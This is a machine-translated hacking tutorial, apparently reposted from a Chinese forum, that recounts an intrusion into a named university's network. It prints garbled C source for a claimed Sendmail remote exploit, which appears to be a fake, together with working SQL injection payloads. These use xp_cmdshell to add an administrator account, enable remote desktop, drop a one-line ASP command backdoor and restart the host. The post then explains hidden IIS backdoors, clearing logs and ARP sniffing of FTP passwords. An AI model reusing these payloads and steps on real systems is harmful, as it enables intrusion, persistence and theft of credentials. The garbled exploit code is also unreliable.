The northern industrial university is hacked

Source: Internet
Author: User
Tags eol
It has been just a year since I first learned about ice blood and started to become a beginner moderator. we can see that Babu is thriving under the management and leadership of bingxue. The technology discussed in the Forum is getting better and better, and the level of original works is getting closer and closer to professional security, I am also very happy .. however, there are fewer articles to take care of cainiao "Hacking". Today I will write an article dedicated to taking care of cainiao. If you are an old bird, you don't have to read this article because it is tailored to cainiao. this article draws on the Path's

Beibei University of Technology is a Beijing Engineering University. At that time, I promised a friend (not my girlfriend ~~~) I tried to win the home page of her school (northern industrial university) before graduation. Later, I only step on her school website and found that the host is Sun OS, this is really a little difficult. Because of my limited level at that time, and I was busy with my studies, I put it on hold for now. Later, more than half a year later, she thought I would mention it again, I decided to analyze it for her. so a friend of mine and I were also in the same school and started to test the school. I used X-scan to scan the site carefully and found that the host was opened on port 225-80 and other ports on port 80 were not opened. I was wondering if there was a script problem on the website and the webpage was static, without dynamic pages, this intrusion brings more difficulties. fortunately, the host opened port 25 and the mail service program used sendmail. The X-scan report showed that Sendmail had the possibility of Remote Exploit due to its low version. so I quickly searched for the Sendmail overflow program for Sun OS in Google, and it was hard to find the source code as follows:

######################################## #######################################
!!! Private !!!
######################################## #######################################

~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
~ | ~ Sendmail <= 8.12.9 Remote Exploit ~ | ~
~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~ _~
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
By 0wn-u, [email] [/Email]

Exploit for new Sendmail vulnerability-discovered again-by Michal zarewski.
Securityfocus link: [url][/url]
This exploit will work against sendmail <= 8.12.9 on Linux, * BSD and Solaris.
###>> If everything is OK, you will find shell on target box, port 31337
Note: This exploit is very powerful, and only root can use it.
Have a nice time with this exploit ;-).

>>>>>>>>>>>> You shocould not have this 0day Sendmail warez !!!! <
This is very private, do not distribute !!!.
-Props to l33tt (), r3t4rd, n0b0dy, gopulg-ET and mebej (U-stupid-l4mer ;-)
-Drops to whitehats ^ H ^ hsuckz ;-)))

######################################## #######################################
!!! Private !!!
######################################## #######################################

# Include <stdio. h>
# Include <stdlib. h>
# Include <signal. h>
# Include <unistd. h>
# Include <sys/types. h>
# Include <sys/socket. h>
# Include <sys/poll. h>
# Include <netinet/in. h>
# Include <errno. h>
# Include <netdb. h>

# Define smtpport 25

/* Improved TCP port (31337) bind shellcode */
Char asmcode [] =
"/X63/x6f/x6e/x76/x3b ";

Int Rev (int ){
Int I = 1;
If (* (char *) & I) Return ();
Return (A> 24) & 0xff) | (A> 16) & 0xff) <8) | (A> 8) & 0xff) <16) | (A & 0xff) <24 );

Char MSG [] = "0day hacking w4r3z !!! ";

Int main (INT argc, char ** argv ){

Struct hostent * HP;
Struct sockaddr_in ADR;
Char buffer [1024], * B, * ls = asmcode;
Int count;
Int I, C, N, sck [2], FP, ptr6, JMP, CNT, OFS, flag =-1;

Printf ("-------------------------------------------------------/N ");
Printf ("Private/N ");
Printf (">>> sendmail <= 8.12.9 Remote exploit by 0wn-u </N ");
Printf ("Private/N ");
Printf ("-------------------------------------------------------/N ");

If (getuid ()! = 0)
Printf ("Sorry !!! /N ");
Printf ("this is very dangerous exploit for whole internet, and that's why only root users can use it !!! /N ");
Printf ("Sorry kiddies :-))/n ");
Exit (0 );

If (argc <2 ){
Printf ("Usage: % s address portnum type/N", argv [0]);
Printf ("address-target address/N ");
Printf ("portnum-shocould be 25/N ");
Printf ("type-Linux, OpenBSD, FreeBSD, NetBSD, SunOS/N ");
System (LS); exit (-1 );

While (C = getopt (argc-1, & argv [1], "se "))! =-1 ){
Switch (c ){
Case's ': Flag = 1; break;
Case 'E': Flag = 2;

Sck [0] = socket (af_inet, sock_dgram, 0 );
Sck [1] = socket (af_inet, sock_stream, 0 );
Printf ("O exploiting Sendmail on % s-wait for r00t shell ..", argv [1]);
System (LS); For (COUNT = 0; count <10; count ++)
{Printf ("."); fflush (stdout); sleep (1 );}
ADR. sin_family = af_inet;
ADR. sin_port = htons (53 );
If (ADR. sin_addr.s_addr = inet_addr (argv [1]) =-1 ){
If (HP = gethostbyname (argv [1]) = NULL ){
If (connect (sck [0], (struct sockaddr *) & ADR, sizeof (ADR) <0 );
If (connect (sck [1], (struct sockaddr *) & ADR, sizeof (ADR) <0 );
Printf ("/n o exploit failed:-(, try to run it on another machine !!! /N ");
Exit (-1 );
I = sizeof (struct sockaddr_in );
If (getsockname (sck [1], (struct sockaddr *) & ADR, & I) =-1 ){
Struct netbuf {unsigned int maxlen; unsigned int Len; char * Buf ;};
Struct netbuf NB;
IOCTL (sck [1], ('s '<8) | 2), "sockmod ");
NB. maxlen = 0 xFFFF;
NB. Len = sizeof (struct sockaddr_in );;
NB. Buf = (char *) & ADR;
IOCTL (sck [1], ('t' <8) | 144), & nb );
N = ntohs (ADR. sin_port );

Asmcode [4 + 48 + 2] = (unsigned char) (n> 8) & 0xff );
Asmcode [4 + 48 + 3] = (unsigned char) (N & 0xff );

If (write (sck [0], MSG, sizeof (MSG) =-1) goto err;
If (CNT = read (sck [0], buffer, sizeof (buffer) =-1) goto err;

Printf ("Stack dump:/N ");
For (I = 0; I <(cnt-512); I ++ ){
Printf ("% S % 02x", (I &&(! (I % 16 )))? "/N": "", (unsigned char) buffer [512 + I]);
Printf ("/n ");

Fp = rev (* (unsigned int *) & buffer [532]);
OFS = (0xfe)-(FP & 0xffffff00) & 0xff );
CNT = 163;

If (buffer [512 + 20 + 2]! = (Char) 0xff) & (buffer [512 + 20 + 3]! = (Char) 0xbf )){
Printf ("system does not seem to be a vulnerable Linux/N"); exit (1 );
If (flag = 1 ){
Printf ("system seems to be running Sendmail, OK :-)/N"); exit (-1 );
If (CNT <(OFS + 28 )){
Printf ("frame PTR is too low to be successfully exploited/N"); exit (-1 );

JMP = rev (fp-586 );
Ptr6 = rev (FP & 0xffffff00)-12 );
Fp = rev (FP & 0xffffff00 );

Printf ("frame PTR = 0x % 08x ADR = % 08x OFS = % d", Rev (FP), Rev (JMP), OFS );
Printf ("Port = % 04x connected! ", (Unsigned short) n); fflush (stdout );

B = buffer;
Memcpy (B, "/XAB/XCD/x01/x00/x00/x02/x00/x00/x00/x00/x00/x01", 12); B + = 12;
For (I = 0; I <strlen (asmcode); I ++) * B ++ = asmcode [I];
For (I = 0; I <(128> 1); I ++, B ++) * B ++ = 0x01;
Memcpy (B, "/x00/x00/x01/x00/x01", 5); B + = 5;
For (I = 0; I <(OFS + 64)> 1); I ++, B ++) * B ++ = 0x01;

* B ++ = 28;
Memcpy (B, "/x06/x00/x00/x00", 4); B + = 4;
Memcpy (B, & FP, 4); B + = 4;
Memcpy (B, "/x06/x00/x00/x00", 4); B + = 4;
Memcpy (B, & JMP, 4); B + = 4;
Memcpy (B, & JMP, 4); B + = 4;
Memcpy (B, & FP, 4); B + = 4;
Memcpy (B, & ptr6, 4); B + = 4;

CNT-= OFS + 28;
For (I = 0; I <(CNT> 1); I ++, B ++) * B ++ = 0x01;

Memcpy (B, "/x00/x00/x01/x00/x01/x00/x00/xfa/xFF", 9); B + = 9;

If (write (sck [0], buffer, B-buffer) =-1) goto err;
Sleep (1); printf ("sent! /N ");

Write (sck [1], "/bin/uname-A/N", 14 );
While (1 ){
Fd_set FDS;
Fd_zero (& FDs );
Fd_set (0, & FDs );
Fd_set (sck [1], & FDs );
If (select (fd_setsize, & FDS, null )){
Int CNT;
Char Buf [1024];
If (fd_isset (0, & FDs )){
If (CNT = read (0, Buf, 1024) <1 ){
If (errno = ewouldblock | errno = eagain) continue;
Else break;
Write (sck [1], Buf, CNT );
If (fd_isset (sck [1], & FDs )){
If (CNT = read (sck [1], Buf, 1024) <1 ){
If (errno = ewouldblock | errno = eagain) continue;
Else break;
Write (1, Buf, CNT );
Exit (0 );
Perror ("error"); exit (-1 );

It is said that the overflow program of this version is the highest among all Sendmail overflow programs. I will compile it with GCC quickly (if I am a Windows operating system, I can install cygwin and then compile this overflow Program)
Enter cygwin and enter gcc-O Sendmail. C to compile successfully. Then, test the main site according to the overflow program usage method. Enter Sendmail 25, and press enter ....... Ah, it actually failed ....... This is really disappointing (I still release the source code for use in the same industry, maybe the host you test can be successful ). it seems that this road is different. You can only find another way. I have been thinking for a while. Well, I have some ideas (I will explain it to you in detail below ). because I am not in this school and want to take CET4, I have communicated my ideas with a friend at this school. Then I put the matter on hold again, I want to finish the test. A few months later, I heard that this friend has succeeded, and then I won't mention it again. in short, you have to do it yourself. at this time, when I browsed the school's homepage, I intuitively told me that there was already a webpage Trojan. I used IE to check the source code. Haha, what we used was the webpage Trojan of the Big Brother Ice fox. now let me reveal the story of the university being hacked.

At that time, the idea that the Sun OS could be hacked was to find a vulnerable machine in the same network segment. Of course, it would be better to use Windows and start from his neighbors. (the old man has mastered this technology, so I reiterate this article is written by cainiao again) and then sniffers the FTP password of the host through the network segment. at that time, the reason why I put the problem on hold was that the machine in the same network segment of the school blocked the Internet IP address, which was inconvenient to intrude into. Fortunately, my family is not far from this school ...... Okay. Now let's get started.
I took out my favorite portready1.6 scanner. This software is not open source and scanning speed is quite fast. We have downloaded it here (51 floor)
Http:// FID = 23 & tid = 4450 & fpage = 1 & toread = & page = 6

Ping first
The Host IP address is Then, use portready1.6 to scan from to, and only scan port 80. this is faster. check the returned banner from port 80. if it's iis5.0, use IE to browse it. If it's ASP, I will win the prize. after scanning, only two machines that meet the requirements are found to be and let's take a look at this machine This machine has an asp "opinion collection" system. Telnet 1433 to display port 1433 closed. then I attempted to enter the information in the User Login system.
Username: Admin Password: 'or' = 'Haha, I went in. Don't be too happy, it seems that many pages have been deleted by a friend who is not advanced (probably to prevent me from coming in). I Telnet 3389 and open it in 3389, it seems that someone has been here. well, there is still a machine, indicating there is still hope. I opened with IE and saw that it was an ASP examination system. This time, I am very happy. I found the injection point and started the test with nbsi2. for more information about how to find and manually test injection points, and how to prevent injection, see here.
Http:// Tid = 998
The famous "SQL Injection tianshu" written by Xiao Zhu ".
The injection point I found is
Http:// Id = 1
After testing with nbsi2, I found that the database is SQL Server and the permission is Sa. Haha, And I will add an account as soon as possible, and then enable the other party 3389.
Http:// Id = 1'; Exec master. DBO. xp_cmdshell 'net user evilcat estwebserver/add '-
Then, upgrade evilcat to administrator.
Http:// Id = 1'; Exec master. DBO. xp_mongoshell 'net localgroup administrators evilcat/add '-

Next we open 3389.
Http:// Id = 1'; Exec master. DBO. xp_mongoshell 'echo [components]> C:/evilcat '-

Http:// Id = 1'; Exec master. DBO. xp_cmdshell 'echo tsenable = on> C:/evilcat '-

Http:// Id = 1'; Exec master. DBO. xp_cmdshell 'sysocmgr/I: C:/winnt/INF/sysoc. inf/u: C:/evilcat/Q '-

The successful host will turn on 3389 and will automatically restart.
It is depressing to find that the target host has not been restarted after the input. forget it. All the roads go to Rome. I want to find a solution. at this time, I think of the 3389 tool, open3389 and open source code. We have downloaded the tool from the Forum,
Http:// Tid = 7970
Because this program has been included in the virus column, you have to modify it and compile it. After compilation, the program with the compression software shelling, such as udpshell, will be relatively small for easy transmission. here is a prompt (after registering as an octal member, the search function will be enabled. As long as you enter a keyword in the search bar, you can find the desired information)
After the program is modified, the file is transmitted. There are more than one file transfer method, such as IPC, TFTP, and FTP, which has been discussed in the forum for a long time. search by yourself. I personally use webshell to transfer files, although it cannot transfer large files. get webshell put method if db_owner commonly used is backup a shell, cainiao can use the path to write the tool to get, the Forum here to download the Tid = 7891. For more information about the principles, see the articles on the security Angel homepage superhei. Since the SA permission is applied, we can echo a shell. The specific practices are as follows:

First, we need to obtain the absolute path of the website.
We can obtain it by reading the registry,
Http:// Id = 1; declare % 20 @ result % 20 varchar (255) % 20 exec % 20master. DBO. xp_regread % 20 'HKEY _ LOCAL_MACHINE ', 'System/controlset001/services/w3svc/parameters/virtual % 20roots', % 20 '/', % 20 @ result % 20 output % 20 insert % 20 into % 20 TEMP % 20 (TMP) % 20 values (@ result );--

Of course, there are still many methods. For example, you can get the absolute path through the xp_dirtree stored procedure ..
Here, we can use nbsi2.
The absolute route is as follows:

Then write a backdoor.
Http:// Id = 1'; Exec master. DBO. xp_cmdshell 'echo ^ <% 25 if request ("A") ^ <^> "" then execute request ("A") % 25 ^> E: /www/asp/cat. ASP '-
Then use a living backdoor to write a powerful backdoor, such as the ocean.
You can search for a backdoor in the gossip Forum by yourself.

Upload the file with a Web Trojan and then input it in IE.
Http:// Id = 1'; Exec master. DBO. xp_cmdshell 'e:/www/asp/3389.exe '-
As a result, the host has not been restarted ~~ In fact, I have encountered this phenomenon more than once. As long as the host is restarted, 3389 will be started, because the program has automatically set the registry, but has not restarted.
If the program shutdown.exe is written by Microsoft, if you use the XP system, the program is located in C:/Windows/system32. After being uploaded using webshell, enter it in IE.
Http:// Id = 1'; Exec master. DBO. xp_mongoshell 'e:/www/asp/shutdown.exe/R/T 0 '-

Haha this time it finally restarted. after the restart, 3389 is enabled. Connect to the 3389 connector and clone an administrator account to clear logs and fix Injection Vulnerabilities. To save trouble, use some anti-injection programs, then run SQL Server with low permissions. the important thing is to leave a backdoor. It is easy to use a general backdoor to be found. rootkit is often killed by anti-virus software. I want to find a solution.
Let's create a non-file, no port, no process, no startup Item, no ..... There should be no backdoors with system permissions (exaggerated). I believe anti-virus software has never been able to find them in my life. Haha. I don't know. Do you still remember how to create a hidden directory in IIS? Don't know to see here Tid = 7244, there are tools and animations. You still remember this article black brother <write permission to IIS use> address:
Note that when creating a hidden virtual directory, we should set the application program protection to low, so that if there is a webshell under the hidden directory, it will be the system permission, in addition, you must configure the virtual directory to be hidden as described in <use of IIS write permission>. in this way, we can use the "IIS" vulnerability to send files to the hidden virtual directory and the uploaded ASP trojan also has system permissions. in this way, there is no need to place any files in this hidden virtual directory. you can use the tools provided in <use of IIS write permission> to send a backdoor. however, it should be noted that using this method to transfer files will leave a record in the log, and the hidden virtual directory will be exposed, so remember to clean the log every time you use it, in this way, we can unmount 3389 after completing the task.

Next, we need to sniff the master site of the university for FTP. The specific practices are as follows:
Download the arpsniffer.exe tool in the 3389, and then install the driver winpcap.exe. For your convenience, I will package these two tools in the attachment to download them.
After the winpacap2.1 driver is installed, it is best to restart the host to avoid errors.
After restarting, enter ipconfig in the command line to view the gateway address of the CIDR block. Enter
Arpsniffer.exe 21 C:/Windows/system32/log.txt 1
Here, is the gateway, and is the IP address of the main site of North Industrial University. if the FTP password of the host is detected, the file is generated in C:/Windows/system32/log.txt. of course, to ensure security, we can start arpsnifer in webshell as described in <>. now we have to wait for the school master station administrator to log on to FTP. intrusion is also coming to an end. now, I will write it here. if you do not understand anything in the article, you can directly communicate with me on the gossip Forum, or use the search program of the Forum to search for relevant content on your own.

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.